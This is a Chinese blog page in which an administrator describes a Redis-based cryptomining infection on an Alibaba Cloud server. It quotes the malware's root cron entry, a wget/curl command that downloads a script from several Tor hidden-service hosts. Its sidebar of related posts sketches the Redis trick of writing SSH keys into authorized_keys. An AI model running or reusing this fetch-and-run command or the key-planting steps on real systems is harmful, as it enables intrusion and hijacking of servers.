阿里云服务器养只大虫子:Redis漏洞挖矿造成CPU100%的解决办法

最新推荐文章于 2024-07-05 14:32:57 发布
最新推荐文章于 2024-07-05 14:32:57 发布
阅读量3.8k 收藏 9
点赞数
分类专栏: linux redis 文章标签: redis 挖矿 阿里云漏洞 /root/.x cpu100%
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/diaobatian/article/details/86531890
版权

之前在9月份的时候,我的阿里云服务器出现过一次被挖矿的情况,也是cpu爆满,后来发现是因为mysql的漏洞。

当时抓着mysql一顿处理,新建用户,强密码,设权限,nologin,可算是正常了。

这几天又再次出现了被挖矿的情况,今天算是解决了,舒服,下面说下情况。

表现:服务器上的web应用一场的慢,ssh登陆进去top -c查看如下:

COMMAN处的[UWcUml]占用cpu100%

每次Kill掉它之后,不超过1分钟,会再次出现一个类似的进程,继续爆破cpu。在/var/spool/cron下面发现一个root文件,是定时任务,内容是:

22 * * * * (wget -qU- -O- https://ddgsdk6oou6znsdn.tor2web.io/i.sh || curl -sA- https://ddgsdk6oou6znsdn.tor2web.io/i.sh || wget -qU- -O- ddgsdk6oou6znsdn.onion.in.net/i.sh || curl -sA- ddgsdk6oou6znsdn.onion.in.net/i.sh || wget -qU- -O- ddgsdk6oou6znsdn.tor2web.info/i.sh || curl -sA- ddgsdk6oou6znsdn.tor2web.info/i.sh ||
最低0.47元/天 解锁文章
Sail__
关注
专栏目录
阿里云服务器安装配置redis的方法并且加入到开机启动(推荐)
12-16
下载redis用FTP工具传到服务器或者按照redis官网写的步骤进行操作 wget http://download.redis.io/releases/redis-2.8.18.tar.gz//下载 tar xzf redis-2.8.18.tar.gz//解压 cd redis-2.8.18 make//编译 二、 ...
服务器被挖矿,有command为【kthreaddi】的进程跑满cpu,详细解决步骤
LifeOneOnly的博客
06-02 908
1.使用top命令看到有command为【kthreaddi】的进程,例如12236 2.使用netstat -ltnp命令监听到非法监听的进程,识别方法是xiang'mu
由于redis暴露外网未设置密码被挖矿问题处理
ZhengXinMing1998的博客
05-24 918
一、问题查找 接到腾讯云短信提醒,服务器可能被植入了挖矿程序。 1.于是top查看cpu占用,发现一个名为java8_8的程序会定时隔一段时间就占用系统特别高的cpu 2.检查系统中的定时任务 发现/etc/crontab文件中出现了可疑的定时任务,通过ip查找发现ip地址来自美国 3.检查系统启动项,发现启动项中确有java8_8-server,并且状态位enable的 二、问题处理 1.清除系统该进行的启动项:systemctl disable 服务名 2.查看进程的存储目录,rm -rf /
JeecgBoot jmreport/loadTableData 积木报表漏洞RCE(CVE-2023-4450)漏洞
最新发布
由入门到精通
07-05 578
Jeecg Boot jmreport/loadTableData接口存在FreeMarker SSTI注入漏洞,攻击者可以通过操纵应用程序的模板引擎来执行恶意代码或获取敏感信息由于未授权的 API使用了 freemarker 解析 SQL 语句从而导致了 RCE 漏洞的产生。
Redis未授权漏洞复现,利用其实现的挖矿蠕虫脚本分析
qq_53689523的博客
05-05 883
Redis未授权漏洞复现 挖矿蠕虫脚本分析 恶意代码分析实例
记一次阿里云服务器Redis被【挖矿病毒crypto和pnscan】攻击的case,附带解决方案
ZL_1618的博客
12-27 1209
因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。④ CTF大赛、web安全、渗透测试方面的视频(适合小白学习)①1000+CTF历届题库(主流和经典的应该都有了)③项目源码(四五十个有趣且经典的练手项目及源码)⑦ 2023密码学/隐身术/PWN技术手册大全。⑤ 网络安全学习路线图(告别不入流的学习)⑥ CTF/渗透测试工具镜像文件大全。②CTF技术文档(最全中文版)
基于Spring MVC + Spring + MyBatis的【学生管理管理系统】
D1561691的博客
04-12 749
我还通过一些渠道整理了一些大厂真实面试主要有:蚂蚁金服、拼多多、阿里云、百度、唯品会、携程、丰巢科技、乐信、软通动力、OPPO、银盛支付、中国平安等初,中级,高级Java面试题集合,附带超详细答案,希望能帮助到大家。还有专门针对JVM、SPringBoot、SpringCloud、数据库、Linux、缓存、消息中间件、源码等相关面试题。《互联网大厂面试真题解析、进阶开发核心学习笔记、全套讲解视频、实战项目源码讲义》点击传送门即可获取!帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
Redis阿里云服务器上的安装与使用
01-09
1.远程连接阿里云服务器 2.安装Redis apt install redis-server 3.修改配置信息 (由于Redis阿里云默认是不开启的,因为redis-server 默认配置绑定的 IP 是 IPv6, 操作系统模式 IP v4) 进入redis  进入vim...
阿里云Redis的规范:键值设计、命令使用、客户端使用、相关工具.docx
06-15
### 阿里云Redis规范详解 #### 一、键值设计 **1.1 Key名设计** - **可读性和可管理性**: 使用清晰、有意义的命名规则以确保键的可读性和易于管理。例如,采用“业务名:表名:id”这样的格式,能够很好地表明键的...
阿里云 Redis 开发规范
01-07
本文主要介绍在使用阿里云 Redis 的开发规范,从下面几个方面进行说明。 键值设计 命令使用 客户端使用 相关工具 通过本文的介绍可以减少使用 Redis 过程带来的问题。 一、键值设计 1、key 名设计 可读性和可管理性 ...
Linux挖矿病毒排查(通过redis入侵服务器原理)
程序员阿飘 的博客
01-11 1477
3.将公钥写入目标机器的authorized_keys 文件* cat foo | redis-cli -h 12.34.56.78 -x set crackit* redis-cli -h 12.34.56.78* config set dir /root/.ssh/* config get dir* config set dbfilename "authorized_keys"执行程序在/tmp下2.find / -name qW3xT.4, find / -name ddgs.3016;
redis不加密,导致服务器被黑,执行挖矿程序
Shine_mmm
04-13 564
做到以下这几点,可保证Redis安全 启动:不能以root用户来启动!!! 端口:避免用默认6379端口 地址:避免仅监听本地地址 密码:密码设置复杂一点 redis-cli登录时不要通过redis-cli -a YouPassword来登录,而是先登录后验证,redis-cli后,输入auth YouPassword的方式 限制Redis的文件目录访问权限 设置redis的主目录权限为700...
外网安装redis操作不规范导致服务器被挖矿,无奈之下重装
Irons_one的博客
01-03 916
云服务器安装jdk,tomcat,mysql,redis 推荐使用一个工具:MobaXterm,一个上传文件和远程连接操作一体的软件 1. 安装JDK 用MobaXterm工具将jdk压缩包上传至服务器的一个文件夹中 解压 tar -xvf jdk-8u251-linux-x64.tar.gz -C /usr/java 配置环境变量:查看当前jdk路径 vi /etc/profile 配置完成保存退出 重新编译配置文件 source /etc/profile javac命令查看jdk环境是否配
新手使用Redis时,被挖矿组织偷袭
weixin_55166254的博客
10-20 591
本文大概分析了,当你打开Redis访问权限后,系统是如何被一步步入侵的过程,并记录了一下当被入侵后的一些措施,另外我的知识简单的处理,可能病毒仍未清除干净,需要找更专业的文章进行排查
redis服务器cpu100%的原因和解决方案
热门推荐
weixin_44753686的博客
03-15 1万+
上一篇讲述了由于redis服务器cpu100%导致网站502的问题,今天延续上一篇的内容,说明一下原因和分析过程。 首先引起cpu100%可能的几大原因: 1.redis连接数过高 2.数据持久化导致的阻塞 3.主从存在频繁全量同步 4.value值过大 5.redis慢查询 为了模拟redis服务器cpu100%,临时买了一台阿里云ecs,并把那天清空前的redis备份还原到服务器...
(centos7)阿里云 ECS中毒后CPU一直占用100%的解决过程
Gogym的博客
05-15 6542
这两天发现部署在阿里云上的ECS服务器的CPU一直占用100%,一开始以为只是偶然的,没在意。 后面发现CPU一直满载,这不应该呀。于是赶紧看看是怎么回事。 使用 top 命令查看cpu使用情况: 发现有一个 vTtHH1 的进程占用 200%的cpu,这是什么鬼,貌似哥不曾相识啊。 于是乎,通过命令 :cd /proc/32676 -> ll 查看这到底是什么玩意,...
阿里云服务器挖矿病毒解决方法
慌途L
04-01 4519
公司一直用的阿里云服务器进行生产环境的部署,但是最近某一台服务器上的CPU使用率一直高达95%以上,经过排查项目和代码、定时脚本等,都未发现问题根源,但是有一个文件的占用很高 排查:查看CPU占用率 在服务器上使用命令:top -c 查看进程运行的信息列表 再按下大写的:P 使进程按照CPU使用率排序 类似下图(这里只做演示,非实际情况): 然后可以看到 /usr/local/lib/.libs 占用cpu过高 再接着就是杀进程(这里要排除不是自己的项目所涉及到的) 但是每次杀完之后,CPU就降了下去
阿里云服务器CPU 100%问题
izhxxx的博客
02-14 1468
希望本文的内容对你有所帮助如果可以,麻烦关注一下本站 https://wscoder.com/您的支持,是我的最大动力。
服务器被攻击导致CPU100%的解决
过于丰富,无法简介
09-07 5749
排除服务器上是否有定时任务、顽固脚本等问题 top指令查看cpu占用情况: `` 尝试使用kill指令杀死对应进程,杀完之后发现对应服务依旧会重启: kill -9 pid 查看服务器进程数量,进程数量偏高确实存在问题: netstat -anp |grep tcp |wc -l 查看系统中存在的定时任务,定时任务与占用CPU最高的服务名称相同尝试关闭定时任务 crontab -l 修改定时任务的文件,删除定时任务保存。保存后发现还是会向服务中添加定时任务 crontab -e 直接停止定时任务进程
阿里云MS服务器部署指南:Redis跨VPC连接与rinetd配置详解
此外,云数据库Redis版默认只支持阿里云内部访问,外网连接需按照官方文档(<https://help.aliyun.com/document_detail/43850.html>)进行设置。 3. 安装rinetd在ECS Linux中: 文档指导如何在Linux ECS上安装...
评论 8
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值